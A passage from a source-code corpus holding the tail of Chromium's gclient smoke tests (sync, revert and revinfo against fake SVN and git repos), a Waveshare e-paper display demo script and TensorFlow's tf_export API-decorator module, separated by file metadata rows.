    cur_deps = self.FAKE_REPOS.git_hashes['repo_1'][-1][1]['DEPS']
    repo_2_hash = self.FAKE_REPOS.git_hashes['repo_2'][1][0][:7]
    # Rewrite the pinned hash into a Var() reference and prepend the vars dict.
    new_deps = cur_deps.replace('repo_2@%s\'' % repo_2_hash,
                                'repo_2@\' + Var(\'r2hash\')')
    new_deps = 'vars = {\'r2hash\': \'%s\'}\n%s' % (repo_2_hash, new_deps)
    self.FAKE_REPOS._commit_git('repo_1', {  # pylint: disable=W0212
        'DEPS': new_deps,
        'origin': 'git/repo_1@3\n',
    })

    config_template = (
"""solutions = [{
"name" : "src",
"url" : "%(git_base)srepo_1",
"deps_file" : "DEPS",
"managed" : True,
"custom_vars" : %(custom_vars)s,
}]""")

    self.gclient(['config', '--spec', config_template % {
        'git_base': self.git_base,
        'custom_vars': {}
    }])

    # Tested in testSync.
    self.gclient(['sync', '--deps', 'mac'])
    write(join(self.root_dir, 'src', 'repo2', 'hi'), 'Hey!')

    out = self.parseGclient(['status', '--deps', 'mac', '--jobs', '1'], [])
    # TODO(maruel): http://crosbug.com/3584 It should output the unversioned
    # files.
    self.assertEquals(0, len(out))

    # Revert implies --force implies running hooks without looking at pattern
    # matching. For each expected path, 'git reset' and 'git clean' are run, so
    # there should be two results for each. The last two results should reflect
    # writing git_hooked1 and git_hooked2. There's only one result for the third
    # because it is clean and has no output for 'git clean'.
    out = self.parseGclient(['revert', '--deps', 'mac', '--jobs', '1'],
                            ['running', 'running'])
    self.assertEquals(2, len(out))
    tree = self.mangle_git_tree(('repo_1@3', 'src'),
                                ('repo_2@1', 'src/repo2'),
                                ('repo_3@2', 'src/repo2/repo_renamed'))
    tree['src/git_hooked1'] = 'git_hooked1'
    tree['src/git_hooked2'] = 'git_hooked2'
    self.assertTree(tree)

    # Make a new commit object in the origin repo, to force reset to fetch.
    self.FAKE_REPOS._commit_git('repo_2', {  # pylint: disable=W0212
        'origin': 'git/repo_2@3\n',
    })

    # Point the custom_var at the new repo_2 head and revert again.
    self.gclient(['config', '--spec', config_template % {
        'git_base': self.git_base,
        'custom_vars': {'r2hash': self.FAKE_REPOS.git_hashes['repo_2'][-1][0] }
    }])
    out = self.parseGclient(['revert', '--deps', 'mac', '--jobs', '1'],
                            ['running', 'running'])
    self.assertEquals(2, len(out))
    tree = self.mangle_git_tree(('repo_1@3', 'src'),
                                ('repo_2@3', 'src/repo2'),
                                ('repo_3@2', 'src/repo2/repo_renamed'))
    tree['src/git_hooked1'] = 'git_hooked1'
    tree['src/git_hooked2'] = 'git_hooked2'
    self.assertTree(tree)

    results = self.gclient(['status', '--deps', 'mac', '--jobs', '1'])
    out = results[0].splitlines(False)
    # TODO(maruel): http://crosbug.com/3584 It should output the unversioned
    # files.
    self.assertEquals(0, len(out))
class GClientSmokeBoth(GClientSmokeBase):
  """Smoke tests for a .gclient with one SVN and one git solution."""

  def setUp(self):
    super(GClientSmokeBoth, self).setUp()
    # Both backends must be available for these tests.
    self.enabled = self.FAKE_REPOS.set_up_svn() and self.FAKE_REPOS.set_up_git()

  def testMultiSolutions(self):
    if not self.enabled:
      return
    self.gclient(['config', '--spec',
                  'solutions=['
                  '{"name": "src",'
                  ' "url": "' + self.svn_base + 'trunk/src/"},'
                  '{"name": "src-git",'
                  '"url": "' + self.git_base + 'repo_1"}]'])
    self.parseGclient(['sync', '--deps', 'mac', '--jobs', '1'],
                      ['running', 'running',
                       # This is due to the way svn update is called for a single
                       # file when File() is used in a DEPS file.
                       ('running', self.root_dir + '/src/file/other'),
                       'running', 'running', 'running', 'running',
                       'running', 'running'])
    tree = self.mangle_git_tree(('repo_1@2', 'src-git'),
                                ('repo_2@1', 'src/repo2'),
                                ('repo_3@2', 'src/repo2/repo_renamed'))
    tree.update(self.mangle_svn_tree(
        ('trunk/src@2', 'src'),
        ('trunk/third_party/foo@1', 'src/third_party/foo'),
        ('trunk/other@2', 'src/other')))
    tree['src/file/other/DEPS'] = (
        self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
    tree['src/git_hooked1'] = 'git_hooked1'
    tree['src/git_hooked2'] = 'git_hooked2'
    tree['src/svn_hooked1'] = 'svn_hooked1'
    self.assertTree(tree)

  def testMultiSolutionsJobs(self):
    if not self.enabled:
      return
    self.gclient(['config', '--spec',
                  'solutions=['
                  '{"name": "src",'
                  ' "url": "' + self.svn_base + 'trunk/src/"},'
                  '{"name": "src-git",'
                  '"url": "' + self.git_base + 'repo_1"}]'])
    # There is no guarantee that the ordering will be consistent.
    (stdout, stderr, returncode) = self.gclient(
        ['sync', '--deps', 'mac', '--jobs', '8'])
    stdout = self.untangle(stdout)
    self.checkString('', stderr)
    self.assertEquals(0, returncode)
    results = self.splitBlock(stdout)
    # Same amount of work as testMultiSolutions, just interleaved.
    self.assertEquals(9, len(results))
    tree = self.mangle_git_tree(('repo_1@2', 'src-git'),
                                ('repo_2@1', 'src/repo2'),
                                ('repo_3@2', 'src/repo2/repo_renamed'))
    tree.update(self.mangle_svn_tree(
        ('trunk/src@2', 'src'),
        ('trunk/third_party/foo@1', 'src/third_party/foo'),
        ('trunk/other@2', 'src/other')))
    tree['src/file/other/DEPS'] = (
        self.FAKE_REPOS.svn_revs[2]['trunk/other/DEPS'])
    tree['src/git_hooked1'] = 'git_hooked1'
    tree['src/git_hooked2'] = 'git_hooked2'
    tree['src/svn_hooked1'] = 'svn_hooked1'
    self.assertTree(tree)

  def testMultiSolutionsMultiRev(self):
    """A bare --revision with multiple solutions warns and applies to the
    first solution only."""
    if not self.enabled:
      return
    self.gclient(['config', '--spec',
                  'solutions=['
                  '{"name": "src",'
                  ' "url": "' + self.svn_base + 'trunk/src/"},'
                  '{"name": "src-git",'
                  '"url": "' + self.git_base + 'repo_1"}]'])
    self.parseGclient(
        ['sync', '--deps', 'mac', '--jobs', '1', '--revision', '1',
         '-r', 'src-git@' + self.githash('repo_1', 1)],
        ['running', 'running', 'running', 'running'],
        expected_stderr=
            'You must specify the full solution name like --revision src@1\n'
            'when you have multiple solutions setup in your .gclient file.\n'
            'Other solutions present are: src-git.\n')
    tree = self.mangle_git_tree(('repo_1@1', 'src-git'),
                                ('repo_2@2', 'src/repo2'),
                                ('repo_3@1', 'src/repo2/repo3'),
                                ('repo_4@2', 'src/repo4'))
    tree.update(self.mangle_svn_tree(
        ('trunk/src@1', 'src'),
        ('trunk/third_party/foo@2', 'src/third_party/fpp'),
        ('trunk/other@1', 'src/other'),
        ('trunk/third_party/foo@2', 'src/third_party/prout')))
    self.assertTree(tree)

  def testRevInfo(self):
    if not self.enabled:
      return
    self.gclient(['config', '--spec',
                  'solutions=['
                  '{"name": "src",'
                  ' "url": "' + self.svn_base + 'trunk/src/"},'
                  '{"name": "src-git",'
                  '"url": "' + self.git_base + 'repo_1"}]'])
    self.gclient(['sync', '--deps', 'mac'])
    results = self.gclient(['revinfo', '--deps', 'mac'])
    out = ('src: %(svn_base)s/src/\n'
           'src-git: %(git_base)srepo_1\n'
           'src/file/other: File("%(svn_base)s/other/DEPS")\n'
           'src/other: %(svn_base)s/other\n'
           'src/repo2: %(git_base)srepo_2@%(hash2)s\n'
           'src/repo2/repo_renamed: %(git_base)srepo_3\n'
           'src/third_party/foo: %(svn_base)s/third_party/foo@1\n') % {
               'svn_base': self.svn_base + 'trunk',
               'git_base': self.git_base,
               'hash2': self.githash('repo_2', 1)[:7],
           }
    self.check((out, '', 0), results)
    results = self.gclient(['revinfo', '--deps', 'mac', '--actual'])
    out = ('src: %(svn_base)s/src/@2\n'
           'src-git: %(git_base)srepo_1@%(hash1)s\n'
           'src/file/other: %(svn_base)s/other/DEPS@2\n'
           'src/other: %(svn_base)s/other@2\n'
           'src/repo2: %(git_base)srepo_2@%(hash2)s\n'
           'src/repo2/repo_renamed: %(git_base)srepo_3@%(hash3)s\n'
           'src/third_party/foo: %(svn_base)s/third_party/foo@1\n') % {
               'svn_base': self.svn_base + 'trunk',
               'git_base': self.git_base,
               'hash1': self.githash('repo_1', 2),
               'hash2': self.githash('repo_2', 1),
               'hash3': self.githash('repo_3', 2),
           }
    self.check((out, '', 0), results)

  def testRecurse(self):
    """`gclient recurse` runs the command in every dependency directory and
    exposes GCLIENT_SCM / GCLIENT_URL to it."""
    if not self.enabled:
      return
    self.gclient(['config', '--spec',
                  'solutions=['
                  '{"name": "src",'
                  ' "url": "' + self.svn_base + 'trunk/src/"},'
                  '{"name": "src-git",'
                  '"url": "' + self.git_base + 'repo_1"}]'])
    self.gclient(['sync', '--deps', 'mac'])
    results = self.gclient(['recurse', '-j1', 'sh', '-c',
                            'echo $GCLIENT_SCM,$GCLIENT_URL,`pwd`'])

    entries = [tuple(line.split(','))
               for line in results[0].strip().split('\n')]
    logging.debug(entries)

    bases = {'svn': self.svn_base, 'git': self.git_base}
    expected_source = [
        ('svn', 'trunk/src/', 'src'),
        ('git', 'repo_1', 'src-git'),
        ('svn', 'trunk/other', 'src/other'),
        ('git', 'repo_2@' + self.githash('repo_2', 1)[:7], 'src/repo2'),
        ('git', 'repo_3', 'src/repo2/repo_renamed'),
        ('svn', 'trunk/third_party/foo@1', 'src/third_party/foo'),
    ]
    expected = [(scm, bases[scm] + url, os.path.join(self.root_dir, path))
                for (scm, url, path) in expected_source]

    # Order is not guaranteed; compare sorted.
    self.assertEquals(sorted(entries), sorted(expected))
class SkiaDEPSTransitionSmokeTest(GClientSmokeBase):
  """Simulate the behavior of bisect bots as they transition across the Skia
  DEPS change."""

  FAKE_REPOS_CLASS = FakeRepoSkiaDEPS

  def setUp(self):
    super(SkiaDEPSTransitionSmokeTest, self).setUp()
    self.enabled = self.FAKE_REPOS.set_up_git() and self.FAKE_REPOS.set_up_svn()

  def testSkiaDEPSChangeSVN(self):
    """Syncs back and forth across the revision where the three Skia SVN
    sub-checkouts become one merged git checkout."""
    if not self.enabled:
      return

    # Create an initial checkout:
    # - Single checkout at the root.
    # - Multiple checkouts in a shared subdirectory.
    self.gclient(['config', '--spec',
                  'solutions=['
                  '{"name": "src",'
                  ' "url": "' + self.svn_base + 'trunk/src/",'
                  '}]'])

    checkout_path = os.path.join(self.root_dir, 'src')
    skia = os.path.join(checkout_path, 'third_party', 'skia')
    skia_gyp = os.path.join(skia, 'gyp')
    skia_include = os.path.join(skia, 'include')
    skia_src = os.path.join(skia, 'src')

    gyp_svn_url = self.svn_base + 'skia/gyp'
    include_svn_url = self.svn_base + 'skia/include'
    src_svn_url = self.svn_base + 'skia/src'
    skia_git_url = self.git_base + 'repo_1'

    # Initial sync. Verify that we get the expected checkout.
    res = self.gclient(['sync', '--deps', 'mac', '--revision', 'src@2'])
    self.assertEqual(res[2], 0, 'Initial sync failed.')
    self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_gyp)['URL'],
                     gyp_svn_url)
    self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_include)['URL'],
                     include_svn_url)
    self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_src)['URL'],
                     src_svn_url)

    # Verify that the sync succeeds. Verify that we have the expected merged
    # checkout.
    res = self.gclient(['sync', '--deps', 'mac', '--revision', 'src@3'])
    self.assertEqual(res[2], 0, 'DEPS change sync failed.')
    self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
                                             skia), skia_git_url)

    # Sync again. Verify that we still have the expected merged checkout.
    res = self.gclient(['sync', '--deps', 'mac', '--revision', 'src@3'])
    self.assertEqual(res[2], 0, 'Subsequent sync failed.')
    self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
                                             skia), skia_git_url)

    # Sync back to the original DEPS. Verify that we get the original structure.
    res = self.gclient(['sync', '--deps', 'mac', '--revision', 'src@2'])
    self.assertEqual(res[2], 0, 'Reverse sync failed.')
    self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_gyp)['URL'],
                     gyp_svn_url)
    self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_include)['URL'],
                     include_svn_url)
    self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_src)['URL'],
                     src_svn_url)

    # Sync again. Verify that we still have the original structure.
    res = self.gclient(['sync', '--deps', 'mac', '--revision', 'src@2'])
    self.assertEqual(res[2], 0, 'Subsequent sync #2 failed.')
    self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_gyp)['URL'],
                     gyp_svn_url)
    self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_include)['URL'],
                     include_svn_url)
    self.assertEqual(gclient_scm.SVN.CaptureLocalInfo([], skia_src)['URL'],
                     src_svn_url)

  def testSkiaDEPSChangeGit(self):
    """Same transition as testSkiaDEPSChangeSVN but with a git parent repo,
    pinning by commit hash instead of SVN revision."""
    if not self.enabled:
      return

    # Create an initial checkout:
    # - Single checkout at the root.
    # - Multiple checkouts in a shared subdirectory.
    self.gclient(['config', '--spec',
                  'solutions=['
                  '{"name": "src",'
                  ' "url": "' + self.git_base + 'repo_2",'
                  '}]'])

    checkout_path = os.path.join(self.root_dir, 'src')
    skia = os.path.join(checkout_path, 'third_party', 'skia')
    skia_gyp = os.path.join(skia, 'gyp')
    skia_include = os.path.join(skia, 'include')
    skia_src = os.path.join(skia, 'src')

    gyp_git_url = self.git_base + 'repo_3'
    include_git_url = self.git_base + 'repo_4'
    src_git_url = self.git_base + 'repo_5'
    skia_git_url = self.FAKE_REPOS.git_base + 'repo_1'

    pre_hash = self.githash('repo_2', 1)
    post_hash = self.githash('repo_2', 2)

    # Initial sync. Verify that we get the expected checkout.
    res = self.gclient(['sync', '--deps', 'mac', '--revision',
                        'src@%s' % pre_hash])
    self.assertEqual(res[2], 0, 'Initial sync failed.')
    self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
                                             skia_gyp), gyp_git_url)
    self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
                                             skia_include), include_git_url)
    self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
                                             skia_src), src_git_url)

    # Verify that the sync succeeds. Verify that we have the expected merged
    # checkout.
    res = self.gclient(['sync', '--deps', 'mac', '--revision',
                        'src@%s' % post_hash])
    self.assertEqual(res[2], 0, 'DEPS change sync failed.')
    self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
                                             skia), skia_git_url)

    # Sync again. Verify that we still have the expected merged checkout.
    res = self.gclient(['sync', '--deps', 'mac', '--revision',
                        'src@%s' % post_hash])
    self.assertEqual(res[2], 0, 'Subsequent sync failed.')
    self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
                                             skia), skia_git_url)

    # Sync back to the original DEPS. Verify that we get the original structure.
    res = self.gclient(['sync', '--deps', 'mac', '--revision',
                        'src@%s' % pre_hash])
    self.assertEqual(res[2], 0, 'Reverse sync failed.')
    self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
                                             skia_gyp), gyp_git_url)
    self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
                                             skia_include), include_git_url)
    self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
                                             skia_src), src_git_url)

    # Sync again. Verify that we still have the original structure.
    res = self.gclient(['sync', '--deps', 'mac', '--revision',
                        'src@%s' % pre_hash])
    self.assertEqual(res[2], 0, 'Subsequent sync #2 failed.')
    self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
                                             skia_gyp), gyp_git_url)
    self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
                                             skia_include), include_git_url)
    self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
                                             skia_src), src_git_url)
class GClientSmokeFromCheckout(GClientSmokeBase):
  # WebKit abuses this. It has a .gclient and a DEPS from a checkout.

  def setUp(self):
    super(GClientSmokeFromCheckout, self).setUp()
    self.enabled = self.FAKE_REPOS.set_up_svn()
    # Replace the scratch dir with an actual SVN checkout of trunk/webkit,
    # which carries its own .gclient and DEPS.
    os.rmdir(self.root_dir)
    if self.enabled:
      usr, pwd = self.FAKE_REPOS.USERS[0]
      subprocess2.check_call(
          ['svn', 'checkout', self.svn_base + '/trunk/webkit',
           self.root_dir, '-q',
           '--non-interactive', '--no-auth-cache',
           '--username', usr, '--password', pwd])

  def testSync(self):
    if not self.enabled:
      return
    self.parseGclient(['sync', '--deps', 'mac', '--jobs', '1'],
                      ['running', 'running'])
    tree = self.mangle_svn_tree(
        ('trunk/webkit@2', ''),
        ('trunk/third_party/foo@1', 'foo/bar'))
    self.assertTree(tree)

  def testRevertAndStatus(self):
    if not self.enabled:
      return
    self.gclient(['sync'])

    # TODO(maruel): This is incorrect.
    out = self.parseGclient(['status', '--deps', 'mac', '--jobs', '1'], [])

    # Revert implies --force implies running hooks without looking at pattern
    # matching.
    results = self.gclient(['revert', '--deps', 'mac', '--jobs', '1'])
    out = self.splitBlock(results[0])
    self.assertEquals(2, len(out))
    self.checkString(2, len(out[0]))
    self.checkString(2, len(out[1]))
    self.checkString('foo', out[1][1])
    self.checkString('', results[1])
    self.assertEquals(0, results[2])
    tree = self.mangle_svn_tree(
        ('trunk/webkit@2', ''),
        ('trunk/third_party/foo@1', 'foo/bar'))
    self.assertTree(tree)

    # TODO(maruel): This is incorrect.
    out = self.parseGclient(['status', '--deps', 'mac'], [])

  def testRunHooks(self):
    if not self.enabled:
      return
    # Hooks aren't really tested for now since there is no hook defined.
    self.gclient(['sync', '--deps', 'mac'])
    out = self.parseGclient(['runhooks', '--deps', 'mac'], ['running'])
    self.assertEquals(1, len(out))
    self.assertEquals(2, len(out[0]))
    self.assertEquals(3, len(out[0][0]))
    self.checkString('foo', out[0][1])
    tree = self.mangle_svn_tree(
        ('trunk/webkit@2', ''),
        ('trunk/third_party/foo@1', 'foo/bar'))
    self.assertTree(tree)

  def testRevInfo(self):
    if not self.enabled:
      return
    self.gclient(['sync', '--deps', 'mac'])
    results = self.gclient(['revinfo', '--deps', 'mac'])
    # The root has no known upstream URL in this layout, hence 'None'.
    expected = (
        './: None\nfoo/bar: %strunk/third_party/foo@1\n' % self.svn_base,
        '', 0)
    self.check(expected, results)
    # TODO(maruel): To be added after the refactor.
    #results = self.gclient(['revinfo', '--snapshot'])
    #expected = (
    #    './: None\nfoo/bar: %strunk/third_party/foo@1\n' % self.svn_base,
    #    '', 0)
    #self.check(expected, results)

  def testRest(self):
    """Covers the remaining subcommands: cleanup and diff."""
    if not self.enabled:
      return
    self.gclient(['sync'])
    # TODO(maruel): This is incorrect, it should run on ./ too.
    self.parseGclient(
        ['cleanup', '--deps', 'mac', '--verbose', '--jobs', '1'],
        [('running', join(self.root_dir, 'foo', 'bar'))])
    self.parseGclient(
        ['diff', '--deps', 'mac', '--verbose', '--jobs', '1'],
        [('running', join(self.root_dir, 'foo', 'bar'))])
if __name__ == '__main__':
  # -v: enable DEBUG logging for the smoke tests themselves.
  if '-v' in sys.argv:
    logging.basicConfig(level=logging.DEBUG)
  # -c: collect coverage. The flag is removed from argv before unittest.main()
  # parses it, and any stale .coverage file is deleted first.
  if '-c' in sys.argv:
    COVERAGE = True
    sys.argv.remove('-c')
    if os.path.exists('.coverage'):
      os.remove('.coverage')
    # Store coverage data next to the repository root, not the cwd.
    os.environ['COVERAGE_FILE'] = os.path.join(
        os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
        '.coverage')
  unittest.main()
| 40.142679 | 80 | 0.560477 |
91aa8f03fd9a324a332b3af3179b839e58af7bc2 | 3,028 | py | Python | doc/display/e-Paper-master/RaspberryPi_JetsonNano/python/examples/epd_1in02_test.py | bartoszp1992/Tacho2 | b8bf0928775c648b6191b7d90890d09bd87799f0 | [
"MIT"
] | null | null | null | doc/display/e-Paper-master/RaspberryPi_JetsonNano/python/examples/epd_1in02_test.py | bartoszp1992/Tacho2 | b8bf0928775c648b6191b7d90890d09bd87799f0 | [
"MIT"
] | null | null | null | doc/display/e-Paper-master/RaspberryPi_JetsonNano/python/examples/epd_1in02_test.py | bartoszp1992/Tacho2 | b8bf0928775c648b6191b7d90890d09bd87799f0 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding:utf-8 -*-
import sys
import os
picdir = os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'pic')
libdir = os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'lib')
if os.path.exists(libdir):
sys.path.append(libdir)
import logging
from waveshare_epd import epd1in02
import time
from PIL import Image,ImageDraw,ImageFont
import traceback
logging.basicConfig(level=logging.DEBUG)
try:
logging.info("epd1in02 Demo")
epd = epd1in02.EPD()
logging.info("init and Clear")
epd.Init()
epd.Clear()
# Drawing on the image
logging.info("1.Drawing on the image...")
image = Image.new('1', (epd.height, epd.width), 255) # 255: clear the frame
draw = ImageDraw.Draw(image)
font = ImageFont.truetype(os.path.join(picdir, 'Font.ttc'), 24)
draw.text((5, 0), 'hello world', font = font, fill = 0)
draw.text((15, 40), u'微雪电子', font = font, fill = 0)
epd.Display(epd.getbuffer(image))
time.sleep(2)
image = Image.new('1', (epd.height, epd.width), 255) # 255: clear the frame
draw = ImageDraw.Draw(image)
draw.rectangle((20, 0, 100, 80), fill = 0)
draw.rectangle((22, 2, 98, 78), fill = 255)
draw.chord((22, 2, 98, 78), 0, 360, fill = 0)
draw.chord((24, 4, 96, 76), 0, 360, fill = 255)
draw.line((20, 0, 100, 80), fill = 0)
draw.line((20, 80, 100, 0), fill = 0)
epd.Display(epd.getbuffer(image))
time.sleep(2)
# read bmp file
logging.info("2.read bmp file...")
image = Image.open(os.path.join(picdir, '1in02.bmp'))
epd.Display(epd.getbuffer(image))
time.sleep(2)
# read bmp file on window
logging.info("3.read bmp file on window...")
image1 = Image.new('1', (epd.width, epd.height), 255) # 255: clear the frame
bmp = Image.open(os.path.join(picdir, '100x100.bmp'))
image1.paste(bmp, (0,0))
epd.Display(epd.getbuffer(image1))
time.sleep(2)
# # partial update
logging.info("4.show time...")
epd.Clear()
epd.Partial_Init()
time_image = Image.new('1', (epd.height, epd.width), 255)
time_draw = ImageDraw.Draw(time_image)
image_old = epd.getbuffer(time_image)
num = 0
while (True):
time_draw.rectangle((10, 10, 120, 50), fill = 255)
time_draw.text((10, 10), time.strftime('%H:%M:%S'), font = font, fill = 0)
newimage = time_image.crop([10, 10, 120, 50])
time_image.paste(newimage, (10,10))
epd.DisplayPartial(image_old, epd.getbuffer(time_image))
image_old = epd.getbuffer(time_image)
num = num + 1
if(num == 10):
break
logging.info("Clear...")
epd.Init()
epd.Clear()
logging.info("Goto Sleep...")
epd.Sleep()
time.sleep(3)
epd.Dev_exit()
except IOError as e:
logging.info(e)
except KeyboardInterrupt:
logging.info("ctrl + c:")
epd1in54.epdconfig.module_exit()
exit()
| 29.398058 | 90 | 0.606671 |
2be4dbb28348e70aa8b0806f8ac5e722932114dc | 7,129 | py | Python | tensorflow/python/util/tf_export.py | AudioStreamTV/tensorflow | 7277ed8ed2da84b227295216632dec52a81f63b3 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/util/tf_export.py | AudioStreamTV/tensorflow | 7277ed8ed2da84b227295216632dec52a81f63b3 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/util/tf_export.py | AudioStreamTV/tensorflow | 7277ed8ed2da84b227295216632dec52a81f63b3 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for exporting TensorFlow symbols to the API.
Exporting a function or a class:
To export a function or a class use tf_export decorator. For e.g.:
```python
@tf_export('foo', 'bar.foo')
def foo(...):
...
```
If a function is assigned to a variable, you can export it by calling
tf_export explicitly. For e.g.:
```python
foo = get_foo(...)
tf_export('foo', 'bar.foo')(foo)
```
Exporting a constant
```python
foo = 1
tf_export("consts.foo").export_constant(__name__, 'foo')
```
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import sys
from tensorflow.python.util import tf_decorator
ESTIMATOR_API_NAME = 'estimator'
TENSORFLOW_API_NAME = 'tensorflow'
# Per-API record of the attribute names used to stash export metadata
# directly on decorated symbols/modules:
#   names:     attribute holding the symbol's exported endpoint names.
#   constants: attribute (on a module) holding exported constant names.
_Attributes = collections.namedtuple(
    'ExportedApiAttributes', ['names', 'constants'])
# Attribute values must be unique to each API.
API_ATTRS = {
    TENSORFLOW_API_NAME: _Attributes(
        '_tf_api_names',
        '_tf_api_constants'),
    ESTIMATOR_API_NAME: _Attributes(
        '_estimator_api_names',
        '_estimator_api_constants')
}
# Same mapping, but for names/constants exported only under the V1 API
# (used when a decorator passes distinct `v1=` names).
API_ATTRS_V1 = {
    TENSORFLOW_API_NAME: _Attributes(
        '_tf_api_names_v1',
        '_tf_api_constants_v1'),
    ESTIMATOR_API_NAME: _Attributes(
        '_estimator_api_names_v1',
        '_estimator_api_constants_v1')
}
class SymbolAlreadyExposedError(Exception):
  """Error raised when API names are attached to a symbol that already has them."""
def get_canonical_name_for_symbol(symbol, api_name=TENSORFLOW_API_NAME):
  """Return the canonical API endpoint name recorded on `symbol`.

  The canonical name is the first non-deprecated endpoint registered for the
  given API (e.g. 'initializers.zeros').

  Args:
    symbol: API function or class.
    api_name: API name (tensorflow or estimator).

  Returns:
    The canonical endpoint name, or None when the symbol carries no export
    metadata for this API.
  """
  if not hasattr(symbol, '__dict__'):
    return None
  names_attr = API_ATTRS[api_name].names
  # Export metadata lives on the innermost (undecorated) callable.
  _, target = tf_decorator.unwrap(symbol)
  if names_attr not in target.__dict__:
    return None
  endpoint_names = getattr(target, names_attr)
  # TODO(annarev): may be add a separate deprecated attribute
  # for estimator names.
  deprecated_names = target.__dict__.get('_tf_deprecated_api_names', [])
  return get_canonical_name(endpoint_names, deprecated_names)
def get_canonical_name(api_names, deprecated_api_names):
  """Return the first endpoint in `api_names` that is not deprecated.

  Args:
    api_names: API names iterable.
    deprecated_api_names: Deprecated API names iterable.

  Returns:
    The first non-deprecated endpoint name, or None when every endpoint is
    deprecated (or `api_names` is empty).
  """
  for candidate in api_names:
    if candidate not in deprecated_api_names:
      return candidate
  return None
class api_export(object):  # pylint: disable=invalid-name
  """Provides ways to export symbols to the TensorFlow API.

  Instances act as decorators: they record API endpoint names as attributes
  on the decorated symbol (see API_ATTRS / API_ATTRS_V1), which a later API
  generation step reads to build the public namespace.
  """

  def __init__(self, *args, **kwargs):
    """Export under the names *args (first one is considered canonical).

    Args:
      *args: API names in dot delimited format.
      **kwargs: Optional keyed arguments.
        v1: Names for the TensorFlow V1 API. If not set, we will use V2 API
          names both for TensorFlow V1 and V2 APIs.
        overrides: List of symbols that this is overriding
          (those overrided api exports will be removed). Note: passing overrides
          has no effect on exporting a constant.
        api_name: Name of the API you want to generate (e.g. `tensorflow` or
          `estimator`). Default is `tensorflow`.
    """
    self._names = args
    # V1 names default to the V2 names when no dedicated `v1=` list is given.
    self._names_v1 = kwargs.get('v1', args)
    self._api_name = kwargs.get('api_name', TENSORFLOW_API_NAME)
    self._overrides = kwargs.get('overrides', [])

  def __call__(self, func):
    """Calls this decorator.

    Args:
      func: decorated symbol (function or class).

    Returns:
      The input function with _tf_api_names attribute set.

    Raises:
      SymbolAlreadyExposedError: Raised when the symbol already carries API
        names for this API (see set_attr).
    """
    api_names_attr = API_ATTRS[self._api_name].names
    api_names_attr_v1 = API_ATTRS_V1[self._api_name].names
    # Undecorate overridden names
    for f in self._overrides:
      _, undecorated_f = tf_decorator.unwrap(f)
      # Strip prior export metadata so the overridden symbols no longer
      # appear in the generated API.
      delattr(undecorated_f, api_names_attr)
      delattr(undecorated_f, api_names_attr_v1)
    _, undecorated_func = tf_decorator.unwrap(func)
    self.set_attr(undecorated_func, api_names_attr, self._names)
    self.set_attr(undecorated_func, api_names_attr_v1, self._names_v1)
    return func

  def set_attr(self, func, api_names_attr, names):
    """Attach export names to `func`, refusing to overwrite existing ones."""
    # Check for an existing api. We check if attribute name is in
    # __dict__ instead of using hasattr to verify that subclasses have
    # their own _tf_api_names as opposed to just inheriting it.
    if api_names_attr in func.__dict__:
      raise SymbolAlreadyExposedError(
          'Symbol %s is already exposed as %s.' %
          (func.__name__, getattr(func, api_names_attr)))  # pylint: disable=protected-access
    setattr(func, api_names_attr, names)

  def export_constant(self, module_name, name):
    """Store export information for constants/string literals.

    Export information is stored in the module where constants/string literals
    are defined.

    e.g.
    ```python
    foo = 1
    bar = 2
    tf_export("consts.foo").export_constant(__name__, 'foo')
    tf_export("consts.bar").export_constant(__name__, 'bar')
    ```

    Args:
      module_name: (string) Name of the module to store constant at.
      name: (string) Current constant name.
    """
    module = sys.modules[module_name]
    api_constants_attr = API_ATTRS[self._api_name].constants
    api_constants_attr_v1 = API_ATTRS_V1[self._api_name].constants
    # Lazily create the per-module constant lists, then append a
    # (endpoint_names, constant_name) pair to each.
    if not hasattr(module, api_constants_attr):
      setattr(module, api_constants_attr, [])
    # pylint: disable=protected-access
    getattr(module, api_constants_attr).append(
        (self._names, name))
    if not hasattr(module, api_constants_attr_v1):
      setattr(module, api_constants_attr_v1, [])
    getattr(module, api_constants_attr_v1).append(
        (self._names_v1, name))
# Convenience decorators with the target API pre-bound.
tf_export = functools.partial(api_export, api_name=TENSORFLOW_API_NAME)
estimator_export = functools.partial(api_export, api_name=ESTIMATOR_API_NAME)
